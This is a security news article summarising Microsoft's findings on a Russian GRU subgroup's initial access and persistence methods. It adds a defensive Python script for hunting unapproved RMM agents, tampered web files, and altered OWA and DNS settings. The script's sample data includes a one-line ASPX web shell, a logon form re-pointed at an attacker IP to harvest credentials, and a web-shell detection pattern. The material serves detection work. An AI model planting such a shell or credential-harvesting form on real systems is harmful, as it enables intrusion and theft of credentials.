Russian Seashell Blizzard Enlists Specialist Initial Access Subgroup t

by CybrGPT

Russian state cyber-actor Seashell Blizzard has engaged a specialist initial access subgroup to increase its ability to compromise high-value targets globally, according to a new Microsoft report.

The multiyear operation has enabled Seashell Blizzard to expand its reach and achieve persistent access in global targets across sensitive sectors.

These target sectors include energy, oil and gas, telecommunications, shipping, arms manufacturing and governments.

Previously, Seashell Blizzard's initial access efforts predominantly focused on Ukraine and other parts of Eastern Europe. More recently, targets have appeared across a much wider range of geographies, including the UK, US, Canada and Australia.

Microsoft assessed that the initial access subgroup's horizontally scalable capabilities have been bolstered since early 2024 by publicly available exploits for numerous remote access products.

These include vulnerabilities in ConnectWise ScreenConnect (CVE-2024-1709, an authentication bypass) and Fortinet FortiClient EMS (CVE-2023-48788, a SQL injection). Both flaws sit on internet-facing management servers, and both were exploited in the wild within days of public disclosure, which is why patch latency on perimeter systems matters so much in this campaign.

The approach aligns with Russia's evolving strategic objectives: since April 2022, Kremlin-backed threat actors have targeted international organizations that are either geopolitically significant or provide military and/or political support to Ukraine.

“Seashell Blizzard’s far-reaching, opportunistic access methods likely offer Russia expansive opportunities for niche operations and activities that will continue to be valuable over the medium term,” the researchers wrote.

Seashell Blizzard, which has been active since at least 2013, conducts global operations on behalf of Russian military intelligence (GRU) Unit 74455.

Its operations range from espionage to cyber-enabled disruption, the latter usually taking the form of destructive attacks and manipulation of industrial control systems (ICS).

Seashell Blizzard Subgroup Initial Access Techniques

The initial access subgroup relies on its own distinct exploits, tooling, infrastructure and late-stage methods to establish persistence on behalf of the broader Seashell Blizzard group, Microsoft said.

It discovers vulnerabilities in Internet-facing infrastructure through direct scanning and the use of third-party internet scanning services and knowledge repositories.

To date, the subgroup has exploited at least eight vulnerabilities in server software typically found on the network perimeter of small office/home office (SOHO) and enterprise networks.

In nearly all cases of successful exploitation, the subgroup took steps to establish long-term persistence on affected systems. These revolve around three specific persistence patterns:

  • Deployment of remote management and monitoring (RMM) suites to achieve persistence and command and control (C2). Microsoft's report names Atera Agent and Splashtop Remote Services among the suites deployed. Using RMM software lets the actors retain full C2 functionality while masquerading as a legitimate utility, reducing the chance of detection; for defenders, the practical consequence is that any RMM agent not on an approved inventory is a finding, regardless of whether the binary itself is signed and benign. This technique was first observed in early 2024.
  • Use of webshells to maintain footholds and to execute the commands needed to deploy secondary tooling for lateral movement. This technique began in mid-2024 and remains the subgroup's predominant persistence method.
  • Malicious modifications to network resources, including Outlook Web Access (OWA) sign-in pages and DNS configurations, which let the subgroup passively harvest network credentials and widen its access. Because the tampered page is the legitimate one with a changed form target or an injected script, it does not trip signature-based controls; file-integrity monitoring of the web root and of DNS records for mail and VPN hosts is the relevant control. This approach is used for targeted operations where the subgroup is likely seeking broader network access and has been observed since late 2021.
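The three persistence patterns above each leave a host- or web-root-level artifact that can be hunted without any threat-intelligence feed: an RMM agent outside the sanctioned set, a file in the web root that is new or differs from its deployment-time hash (or passes request input straight to an evaluator), an OWA logon form that posts somewhere other than the Exchange auth endpoint, and a DNS record for a mail or VPN host that no longer matches the expected value. The following is an added example written for this page, not code from Microsoft's report or from the threat actor; all process events, web files, hashes, hostnames and IP addresses are constructed samples, the `RMM_MARKERS` image-name substrings are assumptions based on vendor product naming, and the sanctioned-RMM baseline and expected DNS values are hypothetical organisation policy.

```python
"""Hunt for the subgroup's three persistence patterns: unapproved RMM agents,
web shells / tampered pages, and modified OWA sign-in or DNS configuration.
All inputs are constructed samples, not real telemetry."""
import hashlib
import re

# --- 1. RMM agents outside the organisation's sanctioned set -------------------
# Process-creation records as (host, user, image path); a simplification of
# Sysmon event 1 / Windows 4688, constructed for this example.
PROCESS_EVENTS = [
    ("FS01", "SYSTEM", r"C:\Program Files\Splashtop\Splashtop Remote\Server\SRService.exe"),
    ("WEB01", "iis apppool\\owa", r"C:\Windows\Temp\AteraAgent.exe"),
    ("WKS07", "jdoe", r"C:\Program Files (x86)\ScreenConnect Client\ScreenConnect.ClientService.exe"),
    ("WKS08", "jdoe", r"C:\Windows\System32\svchost.exe"),
]
# Image-name substrings for common RMM suites (assumed from vendor naming).
RMM_MARKERS = {
    "atera": ("ateraagent",),
    "splashtop": ("srservice", "splashtop"),
    "screenconnect": ("screenconnect",),
}
APPROVED_RMM = {"screenconnect"}  # hypothetical baseline: only ScreenConnect is sanctioned


def find_unapproved_rmm(events, approved=APPROVED_RMM):
    """Return (host, product, image) for every RMM agent that is not sanctioned."""
    hits = []
    for host, _user, image in events:
        name = image.lower()
        for product, markers in RMM_MARKERS.items():
            if any(m in name for m in markers) and product not in approved:
                hits.append((host, product, image))
    return hits


# --- 2. Web shells and tampered pages under the web root ------------------------
def sha256(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


GOOD_LOGON = b'<form action="/owa/auth.owa" method="post">...</form>'
# Constructed snapshot of the web root: logon.aspx has been re-pointed at an
# attacker host, and a short ASPX shell has been dropped in a writable directory.
WEB_FILES = {
    "/owa/auth/logon.aspx": GOOD_LOGON.replace(b'action="/owa/auth.owa"',
                                               b'action="https://203.0.113.7/collect"'),
    "/owa/auth/errorFE.aspx": b"<html>error</html>",
    "/aspnet_client/system_web/x.aspx": b'<%@ Page Language="Jscript"%><%eval(Request.Item["pass"],"unsafe");%>',
}
# Known-good hashes taken at deployment time (constructed).
BASELINE_HASHES = {
    "/owa/auth/logon.aspx": sha256(GOOD_LOGON),
    "/owa/auth/errorFE.aspx": sha256(b"<html>error</html>"),
}
# Heuristic: request input flowing into a code evaluator inside a server-side page.
WEBSHELL_RE = re.compile(rb"(eval|execute|exec|system|shell_exec)\s*\(.*request", re.I | re.S)


def find_suspicious_webfiles(files, baseline=BASELINE_HASHES):
    """Return (path, reason) for files that are new, modified, or look like shells."""
    findings = []
    for path, content in files.items():
        if path not in baseline:
            findings.append((path, "not in baseline"))
        elif sha256(content) != baseline[path]:
            findings.append((path, "hash differs from baseline"))
        if WEBSHELL_RE.search(content):
            findings.append((path, "request input reaches code evaluator"))
    return findings


# --- 3. OWA sign-in page: where does the credential form post? ------------------
FORM_ACTION_RE = re.compile(rb'<form[^>]*action="([^"]+)"', re.I)
SCRIPT_SRC_RE = re.compile(rb'<script[^>]*src="([^"]+)"', re.I)


def check_owa_logon(html, expected_action=b"/owa/auth.owa", own_hosts=("mail.example.com",)):
    """Return unexpected form targets and external script sources on the logon page."""
    issues = [("form action", a.decode()) for a in FORM_ACTION_RE.findall(html) if a != expected_action]
    for src in SCRIPT_SRC_RE.findall(html):
        if src.startswith(b"http") and not any(h.encode() in src for h in own_hosts):
            issues.append(("external script", src.decode()))
    return issues


# --- 4. DNS records for mail/VPN hosts versus the expected values ---------------
EXPECTED_DNS = {("mail.example.com", "A"): "198.51.100.10", ("vpn.example.com", "A"): "198.51.100.20"}
CURRENT_DNS = {("mail.example.com", "A"): "203.0.113.7", ("vpn.example.com", "A"): "198.51.100.20"}


def check_dns(current, expected=EXPECTED_DNS):
    """Return (name, type, expected, actual) for every monitored record that changed."""
    return [(name, rtype, expected[(name, rtype)], value)
            for (name, rtype), value in current.items()
            if (name, rtype) in expected and expected[(name, rtype)] != value]


if __name__ == "__main__":
    for hit in find_unapproved_rmm(PROCESS_EVENTS):
        print("RMM:", hit)
    for finding in find_suspicious_webfiles(WEB_FILES):
        print("WEB:", finding)
    print("OWA:", check_owa_logon(WEB_FILES["/owa/auth/logon.aspx"]))
    print("DNS:", check_dns(CURRENT_DNS))
```

The hash comparison is deliberately the primary web-root check and the evaluator regex only a secondary one: a modified logon page contains no shell-like code at all, and a real web shell can be obfuscated past any single pattern, but neither can avoid changing the file set or the hashes relative to a baseline captured at deployment. In production the baseline would be stored off-host, since an actor with a web shell can rewrite a hash list kept beside the pages it covers.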

The broader Seashell Blizzard group then uses the access gained by the subgroup to deploy secondary tools for credential acquisition and data exfiltration, and to upload custom utilities that give it more robust access to compromised systems.

Microsoft expects the initial access subgroup to continue developing new horizontally scalable techniques to compromise networks both in Ukraine and globally, in support of Russia's war objectives and evolving national priorities.



© 2025 cybrgpt.com – All rights reserved.